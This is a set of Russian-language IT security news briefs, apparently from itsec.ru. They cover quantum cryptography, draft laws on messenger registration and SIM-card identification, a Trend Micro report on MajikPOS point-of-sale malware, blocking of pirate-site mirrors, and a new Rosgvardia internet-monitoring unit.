 Артур Глейм, генеральный директор созданной на базе ИТМО компании "Квантовые технологии", пояснил, что квантовые технологии обеспечат защиту от несанкционированного доступа — в основе квантовой защиты лежат законы физики, по которым состояние фотона нельзя прочесть дважды: после первого воздействия на фотон его состояние изменится и повторная попытка даст другой результат. Это позволит моментально обнаружить любое вмешательство. Информация, которая передается в виде однофотонных лазерных импульсов по оптоволоконным каналам связи, защищена от прослушивания. Взлом такой системы, по сути, противоречит законам физики.

 По словам эксперта, аналогов таких систем защиты в России пока не существует.

http://www.itsec.ru/newstext.php?news_id=115527

Работающие в России мессенджеры обяжут в течение пяти дней с момента поступления соответствующего требования зарегистрироваться в Роскомнадзоре. сообщают "Известия", в противном случае сервисы будут заблокированы для российских пользователей.

 Соответствующие поправки в законы "Об информации", "О связи" и Кодекс об административных правонарушениях разработаны Медиакоммуникационным союзом и Роскомнадзором. В поправках мессенджеры определены как "информационно-коммуникационные сервисы обмена мгновенными сообщениями", соцсети — как "информационно-телекоммуникационные сервисы социальных коммуникаций". Законопроект обязывает владельцев мессенджеров зарегистрироваться в Роскомнадзоре в течении пяти дней после отправки соответствующего уведомления надзорным ведомством.

 Отмечается, что владельцам мессенджеров придется выполнять требования по идентификации пользователей через операторов связи; недопущению массовых рассылок, а также информации, распространяемой с нарушением законодательства; обеспечению конфиденциальности передаваемых сообщений; рассылке сообщений по инициативе федеральных органов исполнительной власти.

 Если мессенджер не выполняет требование Роскомнадзора по регистрации в России или идентификации пользователей, то по решению суда он может быть заблокирован. За неисполнение требований законодательства на владельца мессенджера может быть наложен штраф: для физлиц от 3 тысяч до 5 тысяч рублей; для должностных лиц — от 30 тысяч до 50 тысяч рублей; на юридических лиц — от 800 тысяч до одного миллиона.

 Операторов связи обяжут идентифицировать пользователей SIM-карт через сайт госуслуг, либо с помощью квалифицированной электронной подписи, либо через личный кабинет на сайте оператора. За оказание услуг связи анонимным пользователям операторов будут штрафовать: должностных лиц — от 10 тысяч до 50 тысяч рублей; юрлиц — от 200 тысяч до 300 тысяч рублей.

 Индивидуальных предпринимателей и юрлиц будут штрафовать за несвоевременное предоставление оператору данных о пользователях корпоративных SIM-карт: ИП — от 40 тысяч до 50 тысяч рублей; юрлиц — от 50 тысяч до 70 тысяч рублей.

 Также вводится ответственность для продавцов SIM-карт, не имеющих полномочий от оператора связи на их продажу — т. е. для тех, кто раздает или продает "симки" возле метро. Для граждан — от 2000 до 5000 рублей; для должностных лиц — от 10 тысяч до 50 тысяч; для юрлиц — от 100 тысяч до 200 тысяч рублей. Во всех трех случаях — "с конфискацией идентификационных модулей или без таковой".

http://www.itsec.ru/newstext.php?news_id=115524

Эксперты Trend Micro предупредили о появлении нового варианта вредоносного ПО для PoS-терминалов MajikPOS. Вредонос, детектируемый продуктами компании как TSPY_MAJIKPOS.A, атакует коммерческие организации в США и Канаде.

 По данным исследователей, киберпреступники используют MajikPOS с 28 января 2017 года. Подобно остальным вредоносным программам такого рода MajikPOS предназначен для похищения данных, однако отличается от них модульной структурой. FastPOS (обновленная версия), Gorynych и ModPOS также состоят из нескольких компонентов, выполняющих разные функции. Тем не менее, MajikPOS использует модули по-другому. Вредонос загружает с сервера дополнительный компонент, необходимый для считывания данных с ОЗУ.

 В ходе атак операторы MajikPOS применяют комбинацию из вредоносного ПО и трояна для удаленного доступа (RAT). Точкой входа для злоумышленников служат сервисы, использующие протоколы VNC и RDP и защищенные ненадежными паролями.

 Похищенные данные злоумышленники продают на специализированных сайтах в так называемых магазинах Magic Dump. Стоимость похищенных данных составляет от $9 до $39 за одну карту. Наборы из 25, 50 и 100 стоят $250, $400 и $700 соответственно.

http://www.itsec.ru/newstext.php?news_id=115525

МедиаКоммуникационный союз (МКС, объединяет крупных операторов связи и медиахолдинги) и Роскомнадзор подготовили поправки в законы "Об информации", "О связи" и в Кодекс об административных правонарушениях, обязывающие всех владельцев SIM-карт проходить идентификацию. Коррективы предусматривают штрафы для операторов за каждого анонимного пользователя и для продавцов за раздачу "симок" в подземных переходах, возле метро и т.д., сообщают "Известия".

 Согласно пояснительной записке к законопроекту, операторов связи обяжут идентифицировать владельцев SIM-карт через сайт госуслуг, с помощью электронной подписи либо через личный кабинет на сайте оператора. За оказание услуг анонимным пользователям предусмотрен штраф в размере от 10 тысяч до 50 тысяч рублей для должностных лиц, от 200 тысяч до 300 тысяч рублей для юридических лиц.

 За несвоевременное предоставление оператору информации о пользователях корпоративных SIM-карт индивидуальные предприниматели заплатят штраф в размере от 40 тысяч до 50 тысяч рублей, юрлица - от 50 тысяч до 70 тысяч рублей.

 Также вводится ответственность для продавцов, которые реализуют SIM-карты без разрешения оператора связи. В таком случае предусмотрены штрафы от 2 тысяч до 5 тысяч для граждан, для должностных лиц - от 10 тысяч до 50 тысяч, для юрлиц - от 100 тысяч до 200 тысяч рублей. Во всех трех случаях - "с конфискацией идентификационных модулей или без таковой".

 Кроме прочего, законопроект вводит в законодательное поле мессенджеры. В документе они определены как "информационно-коммуникационные сервисы обмена мгновенными сообщениями", а соцсети - как "информационно-телекоммуникационные сервисы социальных коммуникаций".

 Согласно проекту закона, владельцы мессенджеров должны зарегистрироваться в Роскомнадзоре в течение 5 дней после отправки службой соответствующего уведомления. Владельцы мессенджеров также будут обязаны выполнять требования по идентификации пользователей через операторов связи, предотвращать массовые рассылки и распространение информации с нарушением законодательства, обеспечивать конфиденциальность сообщений, выполнять требования по рассылкам по инициативе федеральных властей.

 В случае невыполнения требований Роскомнадзора мессенджеру-нарушителю грозит блокировка по решению суда. За неисполнение требований законодательства для владельцев мессенджеров предусмотрены штрафы от 3 тысяч до 5 тысяч рублей для физлиц, от 30 тысяч до 50 тысяч рублей для должностных лиц и от 800 тысяч до 1 млн для юрлиц.

http://www.itsec.ru/newstext.php?news_id=115522

Комитет Госдумы по информационной политике, информационным технологиям и связи на заседании 15 марта рекомендовал принять в первом чтении законопроект о блокировке "зеркал" пиратских сайтов, передает РБК со ссылкой на сообщение комитета.

По словам заместителя председателя комитета Вадима Деньгина, дата рассмотрения законопроекта в Госдуме пока не определена.

В феврале правительство России одобрило инициативу о блокировке "зеркал" запрещенных сайтов, которая подразумевает дополнение существующего законодательства специальным термином "производный сайт в сети интернет" или "зеркало". Если законопроект будет принят, суд сможет блокировать производные от запрещенных ресурсов сайты без проведения отдельного заседания — по официальному запросу от правообладателя или Роскомнадзора. Интернет-провайдеров, не исполняющих предписанную блокировку, ждет штраф до 100 тыс. руб., соответствующий закон позже подписал президент России Владимир Путин.

Пираты "довольно оперативно создавали "зеркала" тех сайтов, которые были заблокированы, и ставили на них переадресацию, в итоге образовалась законодательная лакуна и возможность скачивать пиратский контент сохранялась", отмечается в сообщении комитета. В нем также приводятся слова замминистра связи и массовых коммуникаций Алексея Волина, что после принятия законопроекта на основании судебного приказа Московского городского суда "зеркала" можно будет заблокировать в течение 5-7 часов с момента обращения правообладателя. "Для такой оперативной работы при министерстве планируется создать специальную комиссию, которая будет выносить соответствующие заключения, — отметил Волин. — Удаляя "зеркала", мы, можно сказать, отрубаем головы гидры". По итогам прошлого года в реестре оказались 87 тыс. страниц, доменных имен и IP-адресов, сообщал ранее Роскомнадзор.

http://www.itsec.ru/newstext.php?news_id=115541

В Росгвардии создали подразделение, которое будет заниматься выявлением угроз в Интернете и подготовкой к их отражению, сообщает "Росбалт" со ссылкой на источник в правоохранительных органах.

 Агентство отмечает, что в первую очередь в его обязанности входит мониторинг соцсетей для выявления случаев экстремизма, но функции подразделения могут расшириться. Рассматривается вопрос о создании комплексной системы мониторинга Интернета.

 Главой подразделения была назначена Лариса Горячко, которая ранее работала в системе МВД РФ.

 Пока подразделение киберразведки официально оформлено как отдел по информационно-аналитическому обеспечению деятельности Росгвардии. Связано это с тем, что, согласно нынешнему законодательству, Росгвардия не является субъектом оперативно-розыскной деятельности и формально ею заниматься не может. Однако в обозримом будущем ситуация может измениться.